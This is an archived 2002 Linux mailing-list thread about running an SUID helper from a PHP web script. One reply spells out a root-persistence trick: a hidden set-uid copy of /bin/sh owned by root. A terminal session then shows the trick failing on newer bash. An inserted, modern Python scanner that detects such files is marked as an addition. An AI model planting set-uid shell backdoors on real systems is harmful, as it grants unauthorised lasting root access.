[ale] Please Help

Chris Fowler cfowler at outpostsentinel.com
Thu Mar 28 15:49:25 EST 2002


I was not pointing fingers.  I was making a comment that if I did the
commands in my email I would not gain root access.  I should have
gained root.

[root at cfowler root]# cd /home/cfowler
[root at cfowler cfowler]# cp /bin/bahs .sh
cp: cannot stat `/bin/bahs': No such file or directory
[root at cfowler cfowler]# cp /bin/bash .sh
[root at cfowler cfowler]# chmod 4755 .sh
[root at cfowler cfowler]# su - cfowler
[cfowler at cfowler cfowler]$ ./sh
bash: ./sh: No such file or directory
[cfowler at cfowler cfowler]$ ./.sh
.sh-2.05$ exit
exit
[cfowler at cfowler cfowler]$ ls -l .sh
-rwsr-xr-x    1 root     root       519964 Mar 28 14:08 .sh
[cfowler at cfowler cfowler]$
[cfowler at cfowler cfowler]$ ./.sh
.sh-2.05$ cd /root
.sh: cd: /root: Permission denied
.sh-2.05$

Notice how I do not have root even though my shell is 4755 and owned by
root.

Chris
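
As an added example (not part of the original thread): a defender-side check for the kind of file created in the session above, a set-uid copy of a shell left in a home directory. The function names, the `/home` scan root and the reference shell list are assumptions made for illustration.

```python
import hashlib
import os
import stat

def sha256_of(path):
    """Hash a file in chunks so large binaries are not loaded whole."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def find_setid_files(root, reference_shells=("/bin/sh", "/bin/bash")):
    """Return findings for set-uid/set-gid regular files under root.

    Each finding records the owner and whether the content is a
    byte-for-byte copy of one of the reference shells (assumed paths).
    """
    shell_hashes = {}
    for shell in reference_shells:
        try:
            shell_hashes[sha256_of(shell)] = shell
        except OSError:
            continue  # reference shell missing or unreadable on this host
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if not st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                continue
            try:
                copy_of = shell_hashes.get(sha256_of(path))
            except OSError:
                copy_of = None  # unreadable; still report the mode bits
            findings.append({"path": path,
                             "mode": oct(stat.S_IMODE(st.st_mode)),
                             "uid": st.st_uid,
                             "root_owned": st.st_uid == 0,
                             "shell_copy_of": copy_of})
    return findings

if __name__ == "__main__":
    for finding in find_setid_files("/home"):
        print(finding)
```

Any finding with `root_owned` true and a non-empty `shell_copy_of` matches the `-rwsr-xr-x root root .sh` listing shown in the session.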

-----Original Message-----
From: Ken Nagorski [mailto:kenn at pcintelligent.com]
To: ale at ale.org
Sent: Thursday, March 28, 2002 3:32 PM
To: cfowler at outpostsentinel.com
Subject: RE: [ale] Please Help


Hi there,

Yes - I understand that there are security risks, however the Perl script
does some very harsh integrity checking before it runs any commands so I am
not too worried...

Thanks
ken

> You bring up a good point.  I was showing a friend a very simple
> root exploit.  Here's how it goes:
>
> 1) cp /bin/sh ~/.sh
> 2) chown root ~/.sh
> 3) chmod 4755 ~/.sh
>
> You have to gain root access once to make it work.  Then every time you
> log into the machine as a normal user just execute the suid shell. On
> old Linux distros this trick works.  I can not get it to work on RH
> 7.2.  Not sure why.
>
> Chris
>
> -----Original Message-----
> From: Ken Nagorski [mailto:kenn at pcintelligent.com]
> Sent: Thursday, March 28, 2002 3:05 PM
> To: ale at ale.org
> Subject: [ale] Please Help
>
>
> Please tell me someone knows how to do this. Here is the problem.
>
> I need to run a script SUID from a website. It is a PHP script that calls a
> wrapper program written in C and it is set 4755. The script it calls
> just runs a system command, actually a Courier command, the makealiases
> command. But I can't get this to work for the life of me. I know that
> someone has had to have written the script that simplifies system management
> and then needed to run a system command when it is finished, but HOW?
>
> Uhg - Thanks
> Ken
>
>
>
>
> ---
> This message has been sent through the ALE general discussion list. See
> http://www.ale.org/mailing-lists.shtml for more info. Problems should
> be sent to listmaster at ale dot org.